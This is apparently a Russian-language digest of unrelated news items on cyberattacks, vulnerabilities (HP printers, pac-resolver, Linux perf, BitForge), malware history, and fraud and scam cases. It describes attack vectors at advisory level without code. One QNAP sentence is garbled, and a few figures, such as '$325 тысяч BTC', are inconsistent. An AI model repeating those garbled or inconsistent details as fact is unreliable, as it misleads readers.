В Сбербанке рассказали о взрывном росте кибератак на российские компании,
который наблюдается в последние три месяца, кардинальном увеличении их
мощности и новых тактиках злоумышленников. Об этом заявил Сергей Лебедь –
вице-президент, директор департамента кибербезопасности Сбербанка во время
выступления на форуме по практической кибербезопасности Positive Hack Days 11.
По его словам, 6 мая 2022 года Сбербанк отразил самую мощную DDoS-атаку в своей истории. Она была направлена на сайт банка, а вредоносный трафик, сгенерированный ботнетом, исходил из более чем 27 тыс. устройств из Тайваня, США, Японии и Великобритании. Ее мощность составила более 450 гигабайт в секунду.
Сергей Лебедь также отметил, что сегодня преступники применяют новые тактики и инструменты к проведению кибератак, которые включают в себя внедрение кода в рекламные скрипты, применение вредоносного расширения для Google Chrome, использование готовых docker-контейнеров с настроенными инструментами проведения атак. Преступные группировки хорошо координируются, общая численность киберпреступников, действующих против Сбербанка, превышает 100 тыс. человек.
По словам представителя Сбера, сегодня банк круглосуточно находится под кибератаками. Центр киберзащиты Сбербанка в режиме 24/7 ведет анализ киберугроз и оперативно реагирует на них.
Активация вируса происходила 6 марта, в честь дня рождения великого художника.
Вирус загрузочного сектора, впервые обнаруженный в Австралии , вызвал, возможно, первую в истории серьезную панику среди компьютерных вредоносных программ, подстегнув антивирусную индустрию.
В 1991 году владелец компьютерного магазина в Австралии заметил на своем экране странные символы. Расследование причины показало, что вирус заразил систему.
6 марта вирус активировался, перезаписав данные владельцев. Интересно, что вирус остается на устройстве бездействующим и активируется только 6 марта, независимо от того, какой сейчас год.
Поскольку 6 марта — день рождения великого художника эпохи Возрождения Микеланджело, вирус был назван в его честь.
Вирус
Michelangelo —вирус загрузочного сектора, разновидность вредоносного ПО, которое заражает загрузочный сектор жесткого диска или, что более важно, основную загрузочную запись (MBR) жесткого диска. Вирус был разработан для заражения DOS систем и работал на уровне BIOS.
После инфицирования компьютера вирус переписывал все данные, которые содержались на жестком диске устройства, заменяя их случайными символами. Однако угроза работала только в случае, если компьютер жертвы был включен в определенную дату, иначе данные пользователей оставались невредимыми. В основном вирус распространялся через диски с драйверами. Известно, что около 1500 данных на компьютерах были уничтожены только в Германии.
Несмотря на кричащее название, сам Микеланджело нигде не упоминается в самой вредоносной программе. Название было создано сообществом безопасности того времени. Авторы вируса так и не были идентифицированы.
Реклама
Спустя год вирус снова заявил о себе. Поскольку о существовании вируса уже было известно, инсайдеры отрасли и журналисты начали рассуждать о том, сколько компьютеров уже может быть заражено вирусом.
Легенда гласит, что небезызвестный Джон Макафи, основатель одноименной антивирусной компании, заявил журналистам, что Микеланджело мог заразить до 5 миллионов устройств. Около 20% домохозяйств в США владели компьютерами, а 5 миллионов зараженных устройств могли привести к масштабному сбою, последствия которого могли выйти далеко за пределы Северной Америки.
Так как вирус делал непригодными для использования любые файлы на устройстве, его активация могла стать катастрофой для многих компаний, использующих компьютеры для повседневных задач.
По версии Арье Горецкого, который в то время работал в McAfee, Джон Макафи рассказал журналистам, что уровень заражения может составить от 5000 до 5 миллионов устройств. Однако журналисты стали использовать последнюю цифру, что вызывало ажиотаж в СМИ и клиенты стали массово покупать антивирусные продукты McAfee по всему миру.
Ложный страх
По мере приближения долгожданного дня заголовки средств массовой информации вышли из-под контроля: одна из ведущих газет США заявила: «Смертельный вирус завтра посеет хаос».
Страх оказался напрасным. От вируса пострадало всего несколько тысяч компьютеров по всему миру, и в нем не было ничего «смертельного».
В том же году McAfee провела первичное публичное размещение акций, собрав 42 миллиона долларов, что было впечатляющей суммой для компании в 1992 году, в которой работало всего 12 человек.
Однако реальное воздействие вируса Микеланджело заключалось в том, что угроза вредоносного ПО наконец постучала в дверь каждого.
Хотя идея угрожающего компьютерного вируса не была новой, угроза стала очень реальной благодаря сообщениям в СМИ, телевизионным передачам и экспертам, обсуждающим, к каким последствиям может привести компьютерный вирус.
source: infosecurity-magazine.com/blogs/mcafee-michelangelo
Уроженец Волынской области с высшим образованием работал в центральной районной больнице, где занимал должность инженера-программиста информационно- аналитического отдела. Имея доступ к электронно-цифровой подписи заведующего инфекционным отделением больницы, которую он использовал для обеспечения работы информационных систем медучреждения, мужчина скопировал ЭЦП, чтобы несанкционированно использовать его в корыстных целях.
Зная, какой большой спрос существует на услугу фиктивной вакцинации, айтишник вступил в сговор с неустановленными лицами и наладил продажу «официальных» COVID-сертификатов всем желающим. Для этой цели он скачал из интернета официальный бланк свидетельства о вакцинации от COVID-19 и внес в него реквизиты и изображение печати Ковельского городского территориального медобъединения.
Помимо этого, мужчина сделал цифровые копии подписей и печатей двух врачей и компьютерным способом редактировал данные свидетельств, после чего распечатывал их на обычном струйном принтере.
Но самое главное – мужчина вносил фиктивные данные о прививках в государственную электронную систему еНealth, что, фактически, приравнивало их к официальным. Эта регистрация позволяла добавлять сертификаты в «Дію», избегать необходимости самоизоляции при пересечении государственной границы и пользоваться всеми социальными преимуществами, которые дает вакцинация.
За услугу «официальной» регистрации прививок программист брал от 1,500 до 2 тысяч гривен. Всего в материалах расследования упоминаются 12 доказанных эпизодов получения неправомерной выгоды на общую сумму неправомерной выгоды 19 тысяч гривен, а также около 5 десятков эпизодов неправомерного вмешательства в систему еНealth, с использованием нелегально скопированной электронной подписи главврача.
Своими действиями программист нарушил ч. 3 ст. 358 Уголовного Кодекса (повторная подделка официальных документов, совершенная группой лиц по предварительному сговору), а также ч. 1 и 2 ст. 361 (несанкционированное вмешательство в работу компьютерных систем, повлекшее утечку данных или их искажение).
На основе добровольного соглашения с прокурором о признании вины, по совокупности статей обвинения, айтишник заработал наказание в виде 5 лет лишения свободы. Судья счел возможным заменить реальный срок тремя годами испытательного, с запретом занимать должности, связанные с использованием компьютера, в течение 2 лет. Дополнительно, подсудимый должен покрыть расходы на экспертизы, в размере 17 тыс. грн.
Исследователи безопасности из компании F-Secure выявили критическую уязвимость (CVE-2021-39238), затрагивающую более 150 различных моделей принтеров и МФУ HP серии LaserJet, LaserJet Managed, PageWide и PageWide Managed. Уязвимость позволяет через отправку на печать специально оформленного PDF-документа вызвать переполнение буфера в обработчике шрифтов и добиться выполнения своего кода на уровне прошивки. Проблема проявляется с 2013 года и устранена в обновлениях прошивки, опубликованных 1 ноября (производитель был уведомлен о проблеме в апреле).
Атака может быть совершена как на локально подключённые принтеры, так и на сетевые системы печати. Например, атакующий может воспользоваться методами социального инжиниринга и вынудить пользователя распечатать вредоносный файл, атаковать принтер через уже взломанную систему пользователя или применить технику подобную "DNS rebinding", позволяющую при открытии пользователем определённой страницы в браузере отправить HTTP-запрос на сетевой порт принтера (9100/TCP, JetDirect), недоступный для прямого обращения через интернет.
После успешной эксплуатации уязвимости скомпрометированный принтер может использоваться в качестве плацдарма для совершения атаки на локальную сеть, для сниффинга трафика или для оставления скрытой точки присутствия атакующих в локальной сети. Уязвимость также пригодна для построения ботнетов или создания сетевых червей, сканирующих другие уязвимые системы и пытающихся поразить их. Для снижения вреда от компрометации принтеров рекомендуется помещать сетевые принтеры в отдельный VLAN, ограничить межсетевым экраном установку исходящих сетевых соединений от принтеров и использовать отдельный промежуточный сервер печати вместо прямого обращения к принтеру с рабочих станций.
Исследователями также выявлена ещё одна уязвимость (CVE-2021-39237) в принтерах HP, дающая возможность получить полный доступ к устройству. В отличие от первой уязвимости проблеме присвоен умеренный уровень опасности, так как для атаки требуется физический доступ к принтеру (нужно примерно на 5 минут подключиться к UART-порту).
• Video: https://vimeo.com/642270739?embedded=true&source=video_title&owner=16835822
В NPM-пакете pac-resolver, насчитывающем более 3 млн загрузок в неделю, [выявлена уязвимость](https://httptoolkit.tech/blog/npm-pac-proxy-agent- vulnerability/) (CVE-2021-23406), которая позволяет добиться выполнения своего JavaScript-кода в контексте приложения при отправке HTTP-запросов из Node.js- проектов, поддерживающих функцию автонастройки прокси-сервера.
Пакет pac-resolver осуществляет разбор PAC-файлов, включающих сценарий автоматической настройки прокси-сервера. PAC-файл содержит обычный JavaScript- код с функцией FindProxyForURL, определяющей логику выбора прокси в зависимости от хоста и запрашиваемого URL. Суть уязвимости в том, что для выполнения данного JavaScript-кода в pac-resolver применялся предоставляемый в Node.js API VM, позволяющий выполнить JavaScript-код в другом контексте движка V8.
Указанный API явно помечен в документации как не предназначенный для запуска кода, не заслуживающего доверия, так как он не предоставляет полноценной изоляции запускаемого кода и позволяет получить доступ к изначальному контексту. Проблема устранена в выпуске pac-resolver 5.0.0, который переведён на использование библиотеки vm2, предоставляющей более высокий уровень изоляции, подходящий для запуска не заслуживающего доверия кода.
При использовании уязвимой версии pac-resolver атакующий через передачу специально оформленного PAC-файла может добиться выполнения своего JavaScript- кода в контексте кода проекта, использующего Node.js,если в данном проекте используются библиотеки, связанные зависимостями с pac-resolver. Наиболее популярной из проблемных библиотек является Proxy-Agent, указанная в зависимостях у 360 проектов, включая urllib, aws-cdk, mailgun.js и firebase- tools, в сумме насчитывающих более трёх миллионов загрузок в неделю.
Если приложение, связанное зависимостями с pac-resolver, загружает PAC-файл, предоставляемый системой с поддержкой протокола автоматической настройки прокси WPAD, то для подстановки вредоносных PAC-файлов злоумышленники, имеющие доступ к локальной сети, могут воспользоваться распространением настроек прокси через DHCP.
SEC США закончила расследование в отношении криптопирамиды BitConnect. Согласно официально выдвинутым обвинениям, ее основатель Сатиш Кумбхани присвоил $325 тысяч BTC, оцениваемых по сегодняшнему курсу в $15 млрд.
На скамье подсудимых окажется главный промоутер пирамиды Глен Аркаро, и еще шесть активных участников скама.
Учитывая сумму нанесенного ущерба, $2 млрд на момент совершения аферы, SEC США потребует суда присяжных для обвиняемых. Среди них не будет Кумбхани, власти не смогли установить его местонахождение.
Аркаро и еще 4 человека признали вину и активно помогал изобличать деятельность криптопирамиды. В частности, они подтвердил ложность общений BitConnect стабильного дохода 40% в месяц на прибыли, получаемой роботом, торгующего волатильность курса BTC. В реальности, криптопирамида выплачивала прибыль первым инвесторам за счет притока средств новых вкладчиков.
Роль Глена Аркаро была в развитии сети промоутеров Северной Америки, за что он получал 15% с каждой привлеченной этой командой суммы. SEC США определила, что его действия нанесли инвесторам $24 млн убытка, уже компенсированного обвиняемым.
Москвич обратился в полицию, после того как его счета на онлайновой игровой бирже были заблокированы. Всего он вложил туда около 3 млн рублей.
По словам мужчины, в сети он нашел объявление об игре на бирже, оставил заявку и указал свой номер телефона. Позже с ним связался менеджер биржи — куратора игры Broker Support и предложил ему создать аккаунт, куда потерпевший и перевел указанную сумму со своих карт и начал играть.
Когда москвич решил вывести на свои счета денежные средства на сумму около $40к, которые ему удалось заработать, биржа потребовала денежную страховку. У мужчины нужной суммы не оказалось, после чего ему отказали в переводе выигранных им денег.
Злоумышленник украл десятки тысяч ценных документов, но что он с ними сделал – пока неизвестно.
19-летний хакер был арестован на западе Нидерландов местной полицией. Его подозревают во взломе систем и краже десятков тысяч документов Carenzorgt.nl – нидерландского портала медицинских услуг. Carenzorgt используют 9 023 медицинских учреждений и почти полмиллиона пользователей. Портал позволяет пациентам записываться на прием, общаться с лечащим врачом и хранить все свои медицинские данные в одном месте.
Согласно заявлению компании Nedap, которая обнаружила деятельность молодого киберпреступника, похищенные документы могли содержать в себе личные и медицинские данные пациентов различных учреждений. Однако пока неизвестно, делился ли хакер украденным или пытался все поскорее продать другим хакерам.
Полиция вышла на след злоумышленника после получения сообщения от Carenzorgt и в настоящее время изучает улики, собранные во время ареста в доме подозреваемого.
Как сообщает Nedap в своем пресс-релизе , ей стало известно об уязвимости в Carenzorgt 17 октября 2022 года, после чего специалисты компании немедленно закрыли брешь в защите и занялись расследованием возможных последствий ее использования. Благодаря этому им удалось выяснить, что она недавно была использована киберпреступником для кражи документов, хранящихся у Carenzorgt.
Тревожная находка заставила Nedap обратиться в правоохранительные органы и предупредить об инциденте службы безопасности медицинских учреждений, использующих взломанный портал.
Есть и хорошие новости – специалисты компании пока не нашли никаких доказательств того, что похищенные документы были слиты в сеть, однако расследование по этому вопросу еще продолжается.
source: nedap.com/wp-content/uploads/2022/10/Press-release-Carenzorgt.nl- security-incident.pdf
Злоумышленника задержали в международном аэропорту Дели.
Центральное бюро расследований Индии (CBI) в понедельник сообщило, что в международном аэропорту Дели был задержан гражданин России, подозреваемый во взломе программной платформы, которая использовалась для проведения объединенного вступительного экзамена (JEE). JEE – это вступительный экзамен по инженерным специальностям, проводимый для поступления в различные инженерные колледжи в Индии.
Имя задержанного не было раскрыто правоохранительными органами, но индийские СМИ идентифицировали его как Михаила Шаргина.
В дальнейших заявлениях CBI уточнило, что Шаргин принимал участие во взломе программной платформы iLeon, произошедшем в сентябре 2021 года. Хакер и его сообщники сумели получить удаленный доступ к компьютерам некоторых студентов в экзаменационном центре, после чего решали задания от их имени. За свои услуги злоумышленники брали с каждого желающего от $14 700 до $18 400.
QNAP предупреждает клиентов сетевых хранилищ NAS о начавшихся с субботы активных атаках ransomware DeadBolt с использованием 0-day в Photo Station.
Компания выпустила новый информационный бюллетень и призывает всех пользователей NAS с выходом в Интернет обновиться до последней версии Photo Station.
Исправления для 0-day вышли через 12 часов с начала атак.
Проблема решена для следующих версий (и более поздних): QTS 5.0.1: Photo Station 6.1.2; QTS 5.0.0/4.5.x: Photo Station 6.0.22; QTS 4.3.6: Photo Station 5.7.18; QTS 4.3.3: Photo Station 5.4.15; QTS 4.2.6: Photo Station 5.2.14.
Кроме того, в качестве альтернативы QNAP предлагает пользователям заменить Photo Station на более безопасный инструмент QuMagie, предназначенный для управления хранилищем фотографий для устройств QNAP NAS.
Технические детали уязвимости на данный момент не разглашаются.
Производитель настаивал и продолжает настаивать на том, чтотень и призыване подключались напрямую к Интернету, рекомендуя пользователям использовать myQNAPcloud Link или подключить VPN.
Также следует отключить переадресацию портов на маршрутизаторах, запретить доступ к устройствам NAS в Интернете, обновить прошивку, применять надежные пароли для учетных записей пользователей и регулярно делать резервные копии.
Пятничная новость про, пожалуй, самую оригинальную уязвимость в базе MITRE на годы вперёд. Музыкальному видео «Rhythm Nation» 1989-го от Джанет Джексон присвоили код CVE. В песне оказалась та же частота резонансных колебаний, что и в стареньких моделях ноутбучных жёстких на 5400 RPM образца 2005-го. При её прослушивании жёсткие падают. Их можно понять.
Когда это обнаружили, производители затронутых моделей добавили аудиофильтр для вредоносных частот. Может, он всё так же и остался в их ноутах в качестве legacy-артефакта, о котором никто не помнит. Джанис Джоплин однажды сказала, что не хотела бы стать Мадонной. Хотела ли Джанет Джексон стать курьёзной ИБ- угрозой? Вот в чём вопрос.
В 2017 году исследователь безопасности по имени Альфредо Ортега продемонстрировал, как воспроизведение звука частотой 130 Гц может заставить жесткий диск практически полностью перестать реагировать на команды.
В том же году ученые из Принстона и Пердью опубликовали исследование, объясняющее акустические атаки на жесткие диски, которые могут саботировать ПК, банкоматы и системы видеонаблюдения.
video: youtu.be/jxe_mMVeoUY
В ядре Linux [выявлена](https://www.openwall.com/lists/oss- security/2022/05/20/2) уязвимость ([CVE-2022-1729](https://security- tracker.debian.org/tracker/CVE-2022-1729)), позволяющая локальному пользователю получить root-доступ к системе. Уязвимость вызвана состоянием гонки в подсистеме perf, которое можно использовать для инициирования обращения к уже освобождённой области памяти ядра (use-after-free). Проблема проявляется начиная с выпуска ядра 4.0-rc1. Возможность эксплуатации подтверждена для выпусков 5.4.193+.
Исправление пока доступно только в форме патча. Опасность уязвимости сглаживает то, что большинство дистрибутивов по умолчанию ограничивают доступ к perf для непривилегированных пользователей. В качестве обходного пути защиты можно выставить sysctl-параметр kernel.perf_event_paranoid в значение 3.
Уголовное дело возбуждено в отношении двух жителей Волгограда, их подозревают во взяточничестве при реализации услуг электросетей. Также следователями проверяется версия о хищении электроэнергии для производства криптовалюты, сообщила во вторник старший помощник руководителя следственного управления СК России по Волгоградской области Дарья Буянова.
"Возбуждено уголовное дело в отношении двух местных жителей. В зависимости от роли каждого они подозреваются в совершении преступлений, предусмотренных п. "в" ч. 5 ст. 290 УК РФ ("Получение должностным лицом лично взятки в виде денег, совершенное в крупном размере"), п. "б" ч. 4 ст. 291 УК РФ ("Дача взятки должностному лицу лично за совершение заведомо незаконных действий, совершенная в крупном размере")", - сказала она, добавив, что следователями проверяется версия о хищении электроэнергии для производства криптовалюты.
По данным следствия, в декабре 2020 года 34-летний коммерсант обратился к 30-летнему ведущему инженеру группы учета электроэнергии одной из крупных электросетевых компаний Волгоградской области. Предприниматель предложил осуществлять незаконную корректировку приборов учета в сторону их уменьшения и пообещал за это ежемесячное вознаграждение. Инженер согласился и с января по июль 2021 году получил от директора коммерческой организации в общей сложности около 200 тыс. рублей.
Оба мужчины задержаны и заключены под стражу. "Следователями СК РФ проводится комплекс следственных действий, направленных на установление всех обстоятельств совершенного преступления, а также выявление дополнительных эпизодов коррупционной деятельности, связанной с незаконным обеспечением электроэнергией так называемых майнинговых ферм", - добавила Буянова.
source: tass.ru/proisshestviya/14212449
Сотрудники полиции при участии коллег из ФСБ России задержали девять человек, которые подозреваются в незаконной банковской деятельности и хищении более 350 млн рублей. Об этом ТАСС в пятницу сообщила официальный представитель МВД России Ирина Волк.
По ее словам, предварительно установлено, что с 2015 по 2021 год злоумышленники оказывали различным компаниям услуги по обналичиванию денег и уклонению от уплаты налогов. Для этого они зарегистрировали на подставных лиц 41 организацию и проводили через них фиктивные транзакции. Чтобы придать банковским операциям законный вид, злоумышленники использовали многоуровневые цепочки перечислений средств между счетами подконтрольных фирм. За совершение транзитных операций подозреваемые брали с клиентов вознаграждение в размере от 2% с поступивших средств, а за их обналичивание - от 12%.
"Всего за период ведения противоправной деятельности злоумышленникам удалось извлечь доход в сумме свыше 350 млн рублей", - сказала Волк. Возбуждены уголовные дела о незаконной банковской деятельности и неправомерном обороте средств платежей (ст. 172 и 187 УК РФ).
"В результате оперативно-разыскных мероприятий полицейскими при участии управления ФСБ России по Ростовской области были задержаны девять подозреваемых. В настоящее время пятерым из них избрана мера пресечения в виде заключения под стражу, троим - запрет определенных действий, еще одному - домашний арест", - добавила представитель ведомства, отметив, что предварительное расследование уголовных дел продолжается.
source: tass.ru/proisshestviya/14111667
Компания Patchstack, занимающаяся анализом безопасности сайтов на WordPress, опубликовала отчёт, в котором описывается ситуация с патчингом опасных уязвимостей в плагинах для этого движка. Специалисты считают, что дела с заплатками идут не очень хорошо, учитывая популярность этой CMS.
В частности, в 2021-м исследователи наблюдали 150-процентный рост числа выявленных уязвимостей в сравнении с 2020 годом. При этом 29% критических брешей в WordPress-плагинах вообще не получают патчей.
Стоит учитывать, что на этой системе управления контентом работают сегодня 43,2% веб-сайтов. От общего количества обнаруженных дыр только 0,58% пришлись на ядро WordPress, а всё остальное досталось темам и плагинам от различных разработчиков.
91% брешей затрагивают именно бесплатные плагины, а платным проектам достались 8,6% багов. По данным Patchstack, в 2021 году отметились пять критических уязвимостей в 55 темах для WordPress. Наиболее опасная брешь позволяла использовать функции загрузки файлов.
Что касается плагинов, исследователи сообщили о 35 критических дырах, две из которых затрагивают четыре миллиона веб-сайтов. Интересно, что девять таких плагинов вообще никогда не получали патчи от разработчиков, за что их удаляли с официальной площадки.
Согласно отчёту Patchstack, в 2021 году по распространённости лидировали уязвимости класса «межсайтовый скриптинг» (XSS), а за ними шли CSRF (межсайтовая подделка запроса), SQL-инъекция и загрузка произвольного файла.
• Source: <http://patchstack.com/whitepaper/the-state-of-wordpress-security- in-2021>
Эксперты крипторынка сообщили, что проект QiDao на базе Polygon стал жертвой эксплойта. Киберпреступникам удалось взломать децентрализованный протокол Superfluid Finance и похитить около $13 млн в криптовалютах. Сообщается, что украденные средства принадлежали некоторым из ранних инвесторов, а также команде разработчиков.
Аналитики отметили, что управляющий токен QI резко упал в цене за считанные минуты. Его стоимость снизилась с $1,24 до $0,16 сразу после атаки. По состоянию на 14:10 по московскому времени 8 февраля курс QiDao восстановился до $0,6. Разработчики проекта признали, что был совершен взлом вестингового контракта Superfluid. Тем не менее программисты заверили, что средства пользователей находятся в полной безопасности.
Хакеры из Moses Staff взломали системы оборонной компании Rafael
Похищенная информация содержит списки доступа сотрудников к внутренним компьютерным системам, бизнес-презентации и пр.
Иранская хакерская группировка под названием Moses Staff вытавила на продажу в даркнете массив данных, предположительно похищенных в результате взлома израильской оборонной компании Rafael. База данных предлагается по цене в 100 биткойнов (примерно $3,8 млн по текущему курсу).
Опубликованная хакерами информация содержит списки доступа сотрудников к внутренним компьютерным системам, а также конфиденциальные бизнес-презентации. Как сообщила израильская газета Calcalist, в загруженном хакерами видеоролике показаны скриншоты системы, предположительно связанной с наземной системой противовоздушной обороны Sky Cyber. Sky Cyber была приобретена британской армией и сочетает в себе систему контроля и управления боем производства Rafael, радар шведской компании Saab и британскую ракету-перехватчик.
«Взлом Rafael является частью продолжающейся кампании группировки, поддерживаемой Ираном. Часть утекшей информации датирована 2017 годом и якобы указывает на предыдущую атаку. Не исключено, что это техническая манипуляция, позволяющая передатировать или замаскировать старые данные под новые», — сообщил соучредитель и вице-президент по технологиям в компании 10Root Дор Амит (Dor Amit).
Как отметила Calcalist, анализ опубликованных материалов не выявил никаких свидетельств присутствия злоумышленников в сети компании или раскрытия паролей пользователей. В основном данные представляют собой сопоставление информационных систем и сервисов в организации. База данных также содержит ряд ссылок на данные, которые могли быть украдены из систем компании F5.
В Гродно сотрудники предприятия перечислили мошенникам свыше Br70 тыс., сообщили в УВД Гродненского облисполкома.
"Интернет-злоумышленники смогли взломать электронную почту организации и проанализировать содержание. Получив нужные сведения, они выслали туда письма с информацией об изменении банковских реквизитов для оплаты отгруженной ранее продукции. Внешне адрес электронной почты был максимально схож с адресом поставщика. Сотрудники предприятия не обратили внимания на минимальные отличия, полагая, что действительно реквизиты поменялись, добросовестно отправили туда внушительную сумму - более Br70 тыс.", - рассказали правоохранители.
Поставщик продукции на самом деле никаких реквизитов не менял, а деньги оказались в руках злоумышленников. Возбуждено уголовное дело.
Очередная история криптомошенничества произошла в республике Тува ― 51-летняя жительница Кызыла перевела мошенникам свыше 1 млн рублей в попытке заработать на инвестициях в цифровые активы.
Все началось с того, что пострадавшая откликнулась на объявление в социальной сети Одноклассники об обучении заработку на криптовалютах. Затем с ней связалась некая женщина в мессенджере Telegram, которая пообещала, что «сотрудники инвестиционной компании» научат ее прибыльно торговать криптовалютами. Для этого жительнице Кызыла потребовалось скачать Skype, а затем установить приложения ByBit и Coinbase Wallet.
Интересно, что мошенники установили пострадавшей настоящие приложения для работы с криптовалютами. Сама схема заключалась в другом ― «аналитик» заявил, что женщине необходимо перевести $5 000, чтобы получить доступ в VIP-группу для обучения торговле. Кызылчанка взяла кредит в банке и перевела на указанный счет 445 000 рублей. При этом сотрудница банка предупредила клиентку, что, скорее всего, она переводит средства мошенникам, однако та настояла на операции.
«После этого заявительницу добавили в группу в Telegram и ее “наставник” сказал, что нужны еще $5 000 для того, чтобы внести деньги на счет установленной ранее платформы и начать зарабатывать. Заявительница снова отправилась в банк и оформила еще два кредита на общую сумму 595 000 рублей, и также перевела эти деньги по указанию все того же “аналитика” на незнакомый счет», ― сообщают правоохранительные органы Тувы.
Однако и этого оказалось мало. Чтобы уже «действительно зарабатывать» у женщины запросили еще $5 000. Впрочем, на этот раз ресурсы тувинки оказались исчерпаны. Опустошив кредитку и взяв займы в микрофинансовых организациях она наскребла еще 145 000 рублей. С помощью “аналитика” она внесла средства на платформу Bybit (правда не сообщается, на свой ли счет). После этого мошенники перестали выходить с потерпевшей на связь.
В результате 51-летняя жительница Кызыла потеряла 1 185 000 рублей. Сейчас следователи ведут дело по ч. 4 ст. 159 УК РФ «Мошенничество, совершенное в особо крупном размере».
В феврале двое жителей Забайкальского края потеряли в общей сложности около 5 млн рублей в похожих мошеннических схемах.
Киберполиция совместно со следователями Главного следственного управления Нацполиции и иностранными коллегами пресекли деятельность группировки и заморозили активы злоумышленников в более 20 странах.
Начиная с 2019 года, мошенники создали более 100 вебресурсов, на которых предлагали вкладчикам получение сверхдоходов от инвестирования в криптовалюту и торговле ценными бумагами на виртуальных финансовых рынках.
Для общения с потенциальными вкладчиками аферисты образовали call-центры на территории Украины и Грузии. Там работали несколько сотен человек. Фигуранты подбирали операторов со знанием иностранных языков и обучали их использовать методы социальной инженерии при общении с «клиентами». Аферисты убеждали граждан делать значительные инвестиции.
Также для осуществления финансовых операций жертв убеждали установить специальное программное обеспечение. Таким образом мошенники получали удаленный доступ к компьютерам пострадавших и выводили их сбережения на подконтрольные счета. Жертвами становились преимущественно швейцарские и немецкие инвесторы.
Оперативники Департамента киберполиции и следователи Главного следственного управления Нацполиции под процессуальным руководством Офиса Генерального прокурора, совместно с коллегами из Евроюста и Европола, с привлечением правоохранителей Грузии, Германии и Швейцарии провели многоуровневую международную операцию по обезвреживанию транснациональной преступной группировки.
В рамках совместного расследования с правоохранительными органами Швейцарской Конфедерации проведены массовые обыски на территории Украины и Грузии. Изъяты компьютерная техника, мобильные телефоны, наличные и документация. Одновременно с этим на территории стран ЕС заморожены активы организаторов преступной группировки в более 20 странах.
Следователи Главного следственного управления Нацполиции расследуют уголовное производство по ч. 4 ст. 190 (Мошенничество) Уголовного кодекса Украины. Санкция статьи предусматривает до восьми лет лишения свободы. Также швейцарские правоохранители расследуют уголовное производство по ст. 147 (Мошенничество) и ст. 305 (отмывание денег, полученных преступным путем) Уголовного кодекса Швейцарской Конфедерации.
Продолжаются следственные действия с целью установления всех потерпевших и окончательной суммы нанесенного ущерба, и других сообщников фигурантов.
• Source: npu.gov.ua/news/vykryto-mizhnarodne-zlochynne-uhrupovannia-iake- oshukalo-investoriv-ies-na-sotni-tysiach-ievro- kiberpolitsiia?fbclid=IwAR28oVTBeKYPOwKoviQUINj3PxyK0GtYIoCKBH645oQvwevpGfqTElvQu10
Группа депутатов Госдумы во главе с председателем комитета по молодежной политике Артема Метелева направила на рассмотрение в правительство законопроект, направленный на ужесточение наказания за проведение «трэш- стримов» – это публичные онлайн-трансляции, в которых демонстрируются жестокие и противоправные действия, включая насилие, пытки и мучения над жертвами. Законопроект предлагает внести изменения в федеральные законы «Об информации», «О защите детей», а также в Уголовный кодекс и Кодекс об административных правонарушениях. Ожидается, что законопроект будет внесен в Госдуму в осеннюю сессию.
Предложенными поправками предполагается сделать публичную демонстрацию в СМИ или интернете совершения преступления отягчающим обстоятельством. Эти изменения могут коснуться статьи ч.1 ст. 63 УК, что позволит наказывать онлайн-трансляции преступлений более строго. Например, срок лишения свободы за убийство с онлайн-трансляцией может составить от 8 до 20 лет, либо пожизненно вместо лишения свободы на срок от 6 до 15 лет.
Click to expand...
В общей сложности усиливается уголовная ответственность за совершение 10 преступлений, которые наиболее часто встречаются в «трэш-стриминге», такие как умышленное причинение тяжкого вреда здоровью, а также вреда средней тяжести и легкого вреда, побои, истязание, угроза убийством или причинением тяжкого вреда здоровью, похищение, незаконное лишение свободы, использование рабского труда. Предполагается, что за такие деяния будет применяться дополнительное наказание в виде запрета на определенные должности или виды деятельности, что даст возможность судам ограничивать доступ осужденных к интернету.
Также внесены изменения в Кодекс об административных правонарушениях, предусматривающие штрафы для граждан и должностных лиц за распространение в интернете фото и видео сцен с изображениями противоправных деяний, совершенных с особой жестокостью, их последствий, призывов к их совершению, а также пропаганды из корыстных, хулиганских побуждений. Штрафы будут зависеть от статуса лица: для граждан будет составлять от 200 000 до 600 000 руб., для должностных лиц – от 300 000 до 700 000 руб. Дополнительно предусматривается конфискация оборудования, использованного для изготовления таких материалов. Законопроектом устанавливается, что протокол об административном правонарушении будет составляться должностными лицами Роскомнадзора и полиции, а рассматривать дела будет суд.
Под понятием «особой жестокости» понимаются различные формы пыток, истязаний, издевательств и причинения боли как человеку, так и животным.
Исключениями из этого законопроекта составят произведения науки, литературы, искусства, имеющие значительную историческую, художественную или культурную ценность, материалы СМИ и контент, используемый в научных, медицинских или образовательных целях.
Законопроект также предусматривает изменения в закон «Об информации, информационных технологиях и о защите информации», требуя владельцев социальных сетей мониторить «фото- и видеоматериалы с изображением противоправных деяний, совершенных с особой жестокостью, их последствий, призывы к их совершению и пропаганду» (п. 5 ч. 1 ст. 10.6).
Эксперты выражают мнение, что важно, чтобы платформы, где проводятся такие трансляции, понимали, что их ответственность – это фильтровать такой контент, выявлять его и блокировать. Опубликованный материал может привести к включению интернет-страницы в Реестр доменных имен и сетевых адресов с запрещенной к распространению в России информацией (п. 1 ч. 5 ст. 15.1). Подобные материалы также нельзя будет распространять среди детей, согласно поправкам в ч. 2 ст. 5 закона «О защите детей от информации, причиняющий вред их здоровью и развитию».
source: vedomosti.ru/society/articles/2023/08/24/991632-deputati-predlagayut- sdelat-tresh-strimi-otyagchayuschim-obstoyatelstvom- prestuplenii?utm_campaign=vedomosti_public&utm_content=991632-deputati- predlagayut-sdelat-tresh-strimi-otyagchayuschim-obstoyatelstvom- prestuplenii&utm_medium=social&utm_source=telegram_ved
Обнаружены 2 уязвимости нулевого дня в реализации широко используемых криптографических протоколов GG-18, GG-20 и Lindell17. Недостатки затронули популярные криптокошельки, в том числе Coinbase, ZenGo и Binance. Уязвимости позволяют злоумышленнику в считанные секунды похитить криптовалюту из кошелька без взаимодействия с пользователем.
Команда по исследованию криптографии Fireblocks обнаружила недостатки в мае 2023 года, и назвала их «BitForge». Аналитики обнародовали информацию о BitForge в презентации на BlackHat.
На данный момент Coinbase и ZenGo устранили проблемы. Однако, по данным Fireblocks, Binance и десятки других провайдеров кошельков остаются уязвимыми для BitForge. Fireblocks также создали инструмент проверки статуса для проектов , чтобы проверить, подвергаются проекты рискам из-за ненадлежащей реализации протокола конфиденциальных вычислений (Multi-Party Computation, MPC).
Первая уязвимость ( CVE-2023-33241 CVSS: 9.6 ) затрагивает пороговые схемы подписи (Threshold Signature Schemes,TSS) GG18 и GG20 , которые являются основополагающими для индустрии MPC-кошельков, позволяя нескольким сторонам генерировать ключи и совместно подписывать транзакции.
